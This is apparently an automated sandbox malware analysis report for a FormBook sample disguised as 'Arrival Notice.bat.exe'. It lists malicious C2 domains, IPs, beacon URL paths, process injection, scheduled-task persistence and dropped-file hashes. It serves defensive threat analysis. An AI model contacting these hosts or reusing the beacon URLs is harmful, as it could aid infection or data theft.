                                                                    https://static.loopia.se/shared/style/2022-extra-pages.csscompact.exe, 00000012.00000002.4147635781.00000000047AA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000012.00000002.4149982280.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.000000000483A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.apache.org/licenses/LICENSE-2.0Arrival Notice.bat.exe, 00000000.00000002.1733463080.00000000079B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://www.fontbureau.comArrival Notice.bat.exe, 00000000.00000002.1733463080.00000000079B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://shahaf3d.com/wp-content/uploads/2023/08/shahaf-3d-concrete-printing.jpgWRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000003D3C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: malware
                                                                    		unknown
                                                                    https://static.loopia.se/responsive/images/iOS-114.pngcompact.exe, 00000012.00000002.4147635781.00000000047AA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000012.00000002.4149982280.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.000000000483A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.litespeedtech.com/error-pagecompact.exe, 00000012.00000002.4147635781.0000000004486000.00000004.10000000.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000004516000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://wordpress.org/plugins/cmp-coming-soon-maintenance/compact.exe, 00000012.00000002.4147635781.0000000003CAC000.00000004.10000000.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000003D3C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://zz.bdstatic.com/linksubmit/push.jscompact.exe, 00000012.00000002.4147635781.00000000042F4000.00000004.10000000.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000004384000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://static.loopia.se/responsive/styles/reset.csscompact.exe, 00000012.00000002.4147635781.00000000047AA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000012.00000002.4149982280.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.000000000483A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://ac.ecosia.org/autocomplete?q=compact.exe, 00000012.00000002.4150230985.00000000077E8000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000001A.00000002.4149715750.0000000007B68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://static.loopia.se/responsive/images/iOS-57.pngcompact.exe, 00000012.00000002.4147635781.00000000047AA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000012.00000002.4149982280.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.000000000483A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.fontbureau.com/designers/cabarga.htmlNArrival Notice.bat.exe, 00000000.00000002.1733463080.00000000079B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://www.founder.com.cn/cnArrival Notice.bat.exe, 00000000.00000002.1733463080.00000000079B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://w.ladicdn.com/v2/source/html5shiv.min.js?v=1569310222693compact.exe, 00000012.00000002.4147635781.0000000003E3E000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000012.00000002.4149982280.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000003ECE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://td.doubleclick.netcompact.exe, 00000012.00000002.4147635781.0000000003E3E000.00000004.10000000.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000003ECE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown

                                                                    World Map of Contacted IPs

                                                                    • No. of IPs < 25%
                                                                    • 25% < No. of IPs < 50%
                                                                    • 50% < No. of IPs < 75%
                                                                    • 75% < No. of IPs

                                                                    Public IPs

                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                    194.9.94.86
                                                                    		www.torentreprenad.comSweden
                                                                    		39570LOOPIASEtrue
                                                                    202.95.21.152
                                                                    		www.qmancha.comSingapore
                                                                    		64050BCPL-SGBGPNETGlobalASNSGtrue
                                                                    162.0.213.94
                                                                    		www.lenovest.xyzCanada
                                                                    		35893ACPCAtrue
                                                                    15.204.0.108
                                                                    		srripaspocon.orgUnited States
                                                                    		71HP-INTERNET-ASUStrue
                                                                    35.214.235.206
                                                                    		www.grecanici.comUnited States
                                                                    		19527GOOGLE-2UStrue
                                                                    162.241.253.174
                                                                    		ndhockeyprospects.comUnited States
                                                                    		46606UNIFIEDLAYER-AS-1UStrue
                                                                    18.178.206.118
                                                                    		www.93v0.comUnited States
                                                                    		16509AMAZON-02UStrue
                                                                    66.29.145.248
                                                                    		www.zonenail.infoUnited States
                                                                    		19538ADVANTAGECOMUStrue
                                                                    195.35.39.119
                                                                    		futuregainers.netGermany
                                                                    		8359MTSRUtrue
                                                                    172.82.177.221
                                                                    		www.931951.comUnited States
                                                                    		46261QUICKPACKETUStrue
                                                                    66.96.162.149
                                                                    		www.leadchanges.infoUnited States
                                                                    		29873BIZLAND-SDUStrue
                                                                    185.137.235.193
                                                                    		www.klimkina.proRussian Federation
                                                                    		49505SELECTELRUtrue
                                                                    185.234.72.101
                                                                    		unknownUnited Kingdom
                                                                    		30823COMBAHTONcombahtonGmbHDEtrue
                                                                    64.46.118.35
                                                                    		shahaf3d.comUnited States
                                                                    		32475SINGLEHOP-LLCUStrue
                                                                    13.228.81.39
                                                                    		dns.ladipage.comUnited States
                                                                    		16509AMAZON-02UStrue
                                                                    162.241.2.254
                                                                    		shopnow321.onlineUnited States
                                                                    		26337OIS1UStrue

                                                                    General Information

                                                                    Joe Sandbox version:40.0.0 Tourmaline
                                                                    Analysis ID:1459718
                                                                    Start date and time:2024-06-19 22:37:05 +02:00
                                                                    Joe Sandbox product:CloudBasic
                                                                    Overall analysis duration:0h 12m 23s
                                                                    Hypervisor based Inspection enabled:false
                                                                    Report type:full
                                                                    Cookbook file name:default.jbs
                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                    Number of analysed new started processes analysed:25
                                                                    Number of new started drivers analysed:0
                                                                    Number of existing processes analysed:0
                                                                    Number of existing drivers analysed:0
                                                                    Number of injected processes analysed:4
                                                                    Technologies:
                                                                    • HCA enabled
                                                                    • EGA enabled
                                                                    • AMSI enabled
                                                                    Analysis Mode:default
                                                                    Analysis stop reason:Timeout
                                                                    Sample name:Arrival Notice.bat.exe
                                                                    Detection:MAL
                                                                    Classification:mal100.troj.spyw.evad.winEXE@33/20@22/16
                                                                    EGA Information:
                                                                    • Successful, ratio: 80%
                                                                    HCA Information:
                                                                    • Successful, ratio: 88%
                                                                    • Number of executed functions: 72
                                                                    • Number of non-executed functions: 288
                                                                    Cookbook Comments:
                                                                    • Found application associated with file extension: .exe
                                                                    • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                    Warnings

                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                    • VT rate limit hit for: Arrival Notice.bat.exe

                                                                    Simulations

                                                                    Behavior and APIs

                                                                    TimeTypeDescription
                                                                    16:37:57API Interceptor16x Sleep call for process: Arrival Notice.bat.exe modified
                                                                    16:37:59API Interceptor38x Sleep call for process: powershell.exe modified
                                                                    16:38:03API Interceptor12x Sleep call for process: dLrZsz.exe modified
                                                                    16:39:05API Interceptor10493996x Sleep call for process: compact.exe modified
                                                                    16:40:18API Interceptor1x Sleep call for process: -6qxw.exe modified
                                                                    16:41:31API Interceptor108231x Sleep call for process: runonce.exe modified
                                                                    21:37:59Task SchedulerRun new task: dLrZsz path: C:\Users\user\AppData\Roaming\dLrZsz.exe

                                                                    Joe Sandbox View / Context

                                                                    IPs

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    194.9.94.86P1 HWT623ATG.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                    • www.torentreprenad.com/r45o/
                                                                    BASF Purchase Order.docGet hashmaliciousFormBookBrowse
                                                                    • www.xn--matfrmn-jxa4m.se/ufuh/
                                                                    TT-Slip.bat.exeGet hashmaliciousFormBookBrowse
                                                                    • www.torentreprenad.com/r45o/
                                                                    Doc PI.docGet hashmaliciousFormBookBrowse
                                                                    • www.xn--matfrmn-jxa4m.se/ufuh/
                                                                    Beauty_Stem_Invoice.docGet hashmaliciousFormBookBrowse
                                                                    • www.xn--matfrmn-jxa4m.se/ufuh/
                                                                    MOQ010524Purchase order.docGet hashmaliciousFormBookBrowse
                                                                    • www.xn--matfrmn-jxa4m.se/ufuh/
                                                                    SalinaGroup.docGet hashmaliciousFormBookBrowse
                                                                    • www.xn--matfrmn-jxa4m.se/ufuh/
                                                                    PAY-0129.exeGet hashmaliciousFormBookBrowse
                                                                    • www.torentreprenad.com/s2u9/?7H=mTJ4yhH&qHaT0h=5U7DALWrxqzr56VTS66DkMzivwb8eJw+QuQWKosT9GGOOJNmCsoJdRf2YtOKiYr885RpspfnWz9oIB8tKqH0jqi0U2E5YHFFFQ==
                                                                    DHL_SOA_1004404989.exeGet hashmaliciousFormBookBrowse
                                                                    • www.torentreprenad.com/s2u9/?j8j=6NzlX4xHmtqH&rR=5U7DALWrxqzr56VMLK7KnfayygnCZIw+QuQWKosT9GGOOJNmCsoJdRf2YtOKiYr885RpspfnWz9oIB8tKqH3pN+aCUsxPyV8FA==
                                                                    Scan00516.jsGet hashmaliciousFormBook, MailPassView, WSHRATBrowse
                                                                    • www.acre-com.com/me15/?i8O=bxl0&VPudI=AMxDUnLLexuTfXRuHqoxzPfeXrfBw2lKu15RcCpXpuJEBCulcUbatn2YVJ6xbnCfmbZZ
                                                                    202.95.21.152Arrival Notice.bat.exeGet hashmaliciousFormBookBrowse
                                                                    • www.qmancha.com/3in6/
                                                                    AWB_NO_907853880911.exeGet hashmaliciousFormBookBrowse
                                                                    • www.qmancha.com/3in6/
                                                                    igcc.exeGet hashmaliciousFormBookBrowse
                                                                    • www.qmancha.com/3in6/?x0=Beo4F/wq8RdFDjebPnHj1X0mxngmjMMrNdTrW7vwt6cBBJ1fMwEGjCkFOHv2gXsTpd06O+ghlGNN6L13Yf+5YaxQqqrS/i2qyCLFr7bAJDv3UDERmc5Em7s=&Ktq=EPAdvZ
                                                                    erywhere.docGet hashmaliciousFormBookBrowse
                                                                    • www.qmancha.com/3in6/
                                                                    Aviso legal.xlsGet hashmaliciousFormBookBrowse
                                                                    • www.qmancha.com/3in6/

                                                                    Domains

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    www.grecanici.comArrival Notice.bat.exeGet hashmaliciousFormBookBrowse
                                                                    • 35.214.235.206
                                                                    Arrival Notice.bat.exeGet hashmaliciousFormBookBrowse
                                                                    • 35.214.235.206
                                                                    TKHA-A88163341B.bat.exeGet hashmaliciousFormBookBrowse
                                                                    • 35.214.235.206
                                                                    ORDER TKHA-A88163341B.bat.exeGet hashmaliciousFormBookBrowse
                                                                    • 35.214.235.206
                                                                    Arrival Notice.bat.exeGet hashmaliciousFormBookBrowse
                                                                    • 35.214.235.206
                                                                    P1 HWT623ATG.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                    • 35.214.235.206
                                                                    TT-Slip.bat.exeGet hashmaliciousFormBookBrowse
                                                                    • 35.214.235.206
                                                                    ORDINE_N.202309028.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                    • 35.214.235.206
                                                                    8nEe7PHbq6.imgGet hashmaliciousFormBook, GuLoaderBrowse
                                                                    • 35.214.235.206
                                                                    BRIDGE_POLYMERS_POLSKA_23085571.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                    • 35.214.235.206
                                                                    www.zonenail.infoArrival Notice.bat.exeGet hashmaliciousFormBookBrowse
                                                                    • 66.29.145.248
                                                                    AWB_NO_907853880911.exeGet hashmaliciousFormBookBrowse
                                                                    • 66.29.145.248
                                                                    igcc.exeGet hashmaliciousFormBookBrowse
                                                                    • 66.29.145.248
                                                                    erywhere.docGet hashmaliciousFormBookBrowse
                                                                    • 66.29.145.248
                                                                    #U0417#U0430#U043a#U0430#U0437 #U043d#U0430 #U043c#U0430#U0440#U0442.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                    • 66.29.145.248
                                                                    #U0417#U0430#U043a#U0430#U0437 #U043d#U0430 #U0444#U0435#U0432#U0440#U0430#U043b#U044c.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                    • 66.29.145.248
                                                                    #U0417#U0430#U043a#U0430#U0437 #U043d#U0430 #U043c#U0430#U0440#U0442.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                    • 66.29.145.248
                                                                    Scanned PO Copy.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                    • 66.29.145.248
                                                                    purchase list.exeGet hashmaliciousFormBookBrowse
                                                                    • 66.29.145.248
                                                                    www.lenovest.xyzArrival Notice.bat.exeGet hashmaliciousFormBookBrowse
                                                                    • 162.0.213.94
                                                                    Arrival Notice.bat.exeGet hashmaliciousFormBookBrowse
                                                                    • 162.0.213.94
                                                                    TKHA-A88163341B.bat.exeGet hashmaliciousFormBookBrowse
                                                                    • 162.0.213.94
                                                                    ORDER TKHA-A88163341B.bat.exeGet hashmaliciousFormBookBrowse
                                                                    • 162.0.213.94
                                                                    Arrival Notice.bat.exeGet hashmaliciousFormBookBrowse
                                                                    • 162.0.213.94
                                                                    P1 HWT623ATG.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                    • 162.0.213.94
                                                                    TT Slip.pif.exeGet hashmaliciousFormBookBrowse
                                                                    • 162.0.213.94
                                                                    Revised Quotation.bat.exeGet hashmaliciousFormBookBrowse
                                                                    • 162.0.213.94
                                                                    TT-Slip.bat.exeGet hashmaliciousFormBookBrowse
                                                                    • 162.0.213.94
                                                                    dhl-shipment4820911.exeGet hashmaliciousFormBookBrowse
                                                                    • 162.0.213.94

                                                                    ASNs

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    HP-INTERNET-ASUSArrival Notice.bat.exeGet hashmaliciousFormBookBrowse
                                                                    • 15.204.0.108
                                                                    Arrival Notice.bat.exeGet hashmaliciousFormBookBrowse
                                                                    • 15.204.0.108
                                                                    AWB_NO_907853880911.exeGet hashmaliciousFormBookBrowse
                                                                    • 15.204.0.108
                                                                    CnqpVfDyUH.elfGet hashmaliciousMiraiBrowse
                                                                    • 156.153.204.106
                                                                    TKHA-A88163341B.bat.exeGet hashmaliciousFormBookBrowse
                                                                    • 15.204.0.108
                                                                    ORDER TKHA-A88163341B.bat.exeGet hashmaliciousFormBookBrowse
                                                                    • 15.204.0.108
                                                                    3vnlP8ewPQ.elfGet hashmaliciousMirai, GafgytBrowse
                                                                    • 156.152.214.235
                                                                    Wxmy72acxe.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                    • 156.152.214.252
                                                                    x86.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                    • 156.152.214.224
                                                                    https://irs.amazononline.vip/Get hashmaliciousUnknownBrowse
                                                                    • 15.205.60.214
                                                                    LOOPIASEArrival Notice.bat.exeGet hashmaliciousFormBookBrowse
                                                                    • 194.9.94.85
                                                                    Arrival Notice.bat.exeGet hashmaliciousFormBookBrowse
                                                                    • 194.9.94.85
                                                                    TKHA-A88163341B.bat.exeGet hashmaliciousFormBookBrowse
                                                                    • 194.9.94.85
                                                                    ORDER TKHA-A88163341B.bat.exeGet hashmaliciousFormBookBrowse
                                                                    • 194.9.94.85
                                                                    c5018a3915e8a9de41e083f7936c2d232b9a73ba41c8c07fb7b2d90d5f5d8e8e_dump.exeGet hashmaliciousSystemBCBrowse
                                                                    • 93.188.3.13
                                                                    D7KV2Z73zC.rtfGet hashmaliciousFormBookBrowse
                                                                    • 194.9.94.85
                                                                    Scan Doc.docx.docGet hashmaliciousFormBookBrowse
                                                                    • 194.9.94.85
                                                                    file.exeGet hashmaliciousPureLog Stealer, SystemBCBrowse
                                                                    • 93.188.3.11
                                                                    Arrival Notice.bat.exeGet hashmaliciousFormBookBrowse
                                                                    • 194.9.94.85
                                                                    P1 HWT623ATG.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                    • 194.9.94.86
                                                                    ACPCAArrival Notice.bat.exeGet hashmaliciousFormBookBrowse
                                                                    • 162.0.213.94
                                                                    Arrival Notice.bat.exeGet hashmaliciousFormBookBrowse
                                                                    • 162.0.213.94
                                                                    file.exeGet hashmaliciousVidarBrowse
                                                                    • 162.55.53.18
                                                                    file.exeGet hashmaliciousVidarBrowse
                                                                    • 162.55.53.18
                                                                    file.exeGet hashmaliciousVidarBrowse
                                                                    • 162.55.53.18
                                                                    file.exeGet hashmaliciousVidarBrowse
                                                                    • 162.55.53.18
                                                                    Set-up.exeGet hashmaliciousAmadey, Vidar, XmrigBrowse
                                                                    • 162.55.53.18
                                                                    TKHA-A88163341B.bat.exeGet hashmaliciousFormBookBrowse
                                                                    • 162.0.213.94
                                                                    ORDER TKHA-A88163341B.bat.exeGet hashmaliciousFormBookBrowse
                                                                    • 162.0.213.94
                                                                    file.exeGet hashmaliciousVidarBrowse
                                                                    • 162.55.53.18
                                                                    BCPL-SGBGPNETGlobalASNSGArrival Notice.bat.exeGet hashmaliciousFormBookBrowse
                                                                    • 202.95.21.152
                                                                    AWB_NO_907853880911.exeGet hashmaliciousFormBookBrowse
                                                                    • 216.83.58.206
                                                                    unexpressiveness.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                    • 14.128.41.166
                                                                    PO SIMTOSS ATTROCENAPEE 20MT Augamentico77.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                    • 137.220.252.40
                                                                    RFQ - 872219700.exeGet hashmaliciousFormBookBrowse
                                                                    • 118.107.56.60
                                                                    Magma Middle East Oil & Gas - RFQ.exeGet hashmaliciousFormBookBrowse
                                                                    • 118.107.56.40
                                                                    Magma Middle East Oil & Gas Request For Quotation.exeGet hashmaliciousFormBookBrowse
                                                                    • 118.107.56.38
                                                                    iggliest.batGet hashmaliciousFormBook, GuLoaderBrowse
                                                                    • 137.220.252.40
                                                                    Ballahoo.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                    • 14.128.41.164
                                                                    IMG-WAA46573758 Offerte Aanvraag Debitrix.batGet hashmaliciousFormBook, GuLoaderBrowse
                                                                    • 137.220.252.40

                                                                    JA3 Fingerprints

                                                                    No context

                                                                    Dropped Files

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\OdR8akYyHwr3ISR[1].exeArrival Notice.bat.exeGet hashmaliciousFormBookBrowse
                                                                      AWB_NO_907853880911.exeGet hashmaliciousFormBookBrowse
                                                                        C:\Users\user\AppData\Local\Temp\-6qxw.exeArrival Notice.bat.exeGet hashmaliciousFormBookBrowse
                                                                          AWB_NO_907853880911.exeGet hashmaliciousFormBookBrowse

                                                                            Created / dropped Files

                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\-6qxw.exe.log

                                                                            Download File
                                                                            Process:C:\Users\user\AppData\Local\Temp\-6qxw.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):1216
                                                                            Entropy (8bit):5.34331486778365
                                                                            Encrypted:false
                                                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                            Malicious:false
                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Arrival Notice.bat.exe.log

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\Arrival Notice.bat.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):1301
                                                                            Entropy (8bit):5.334025345208678
                                                                            Encrypted:false
                                                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4VE4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HT
                                                                            MD5:C8D49A85A61847AAE0536AE8856F6DEC
                                                                            SHA1:D4121C87789F6AE40FCB9B4F896BC2A0C79182AD
                                                                            SHA-256:3F7809C712D948FF3404AE242044B5463E60BCDCE93121886F8CB36799D4E3CE
                                                                            SHA-512:FFD3460D5B6F00C49D7A91B299765BB7620B440718DACA711566C41A0C153F51E936EE479F4B9E002794EF2E0EBFFCED32ACE15CF9C7A892248EFA6A42468D51
                                                                            Malicious:true
                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\dLrZsz.exe.log

                                                                            Download File
                                                                            Process:C:\Users\user\AppData\Roaming\dLrZsz.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):1301
                                                                            Entropy (8bit):5.334025345208678
                                                                            Encrypted:false
                                                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4VE4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HT
                                                                            MD5:C8D49A85A61847AAE0536AE8856F6DEC
                                                                            SHA1:D4121C87789F6AE40FCB9B4F896BC2A0C79182AD
                                                                            SHA-256:3F7809C712D948FF3404AE242044B5463E60BCDCE93121886F8CB36799D4E3CE
                                                                            SHA-512:FFD3460D5B6F00C49D7A91B299765BB7620B440718DACA711566C41A0C153F51E936EE479F4B9E002794EF2E0EBFFCED32ACE15CF9C7A892248EFA6A42468D51
                                                                            Malicious:false
                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\OdR8akYyHwr3ISR[1].exe

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\compact.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):695808
                                                                            Entropy (8bit):7.940166802607003
                                                                            Encrypted:false
                                                                            SSDEEP:12288:ZFIsPAfpZOTgzeVDNTTPUz8mFRavsE9+dPKX38ctePh0E3m1BJSVYRrxNn:/IKGOcz6NPPK88EUh28ctcmL1Nn
                                                                            MD5:BD0CF4524C08026BA27005393E1F93A9
                                                                            SHA1:EDBC879DB8194B28F0CB398D180A593791954B76
                                                                            SHA-256:795551251C9B793C9E834D3EE0764B6D29D9B6716EF78349CB771AB462DDF104
                                                                            SHA-512:6BF1EE5EE504A52E3E974CAFD7A172B1317D4B6CD7BCC198EC57DBDF0BDB7019E4ADBB3F036D75C2D80E128B52D006ECD5791FBA7D33297AB39A9B1C2F16EC11
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                            • Antivirus: ReversingLabs, Detection: 62%
                                                                            Joe Sandbox View:
                                                                            • Filename: Arrival Notice.bat.exe, Detection: malicious, Browse
                                                                            • Filename: AWB_NO_907853880911.exe, Detection: malicious, Browse
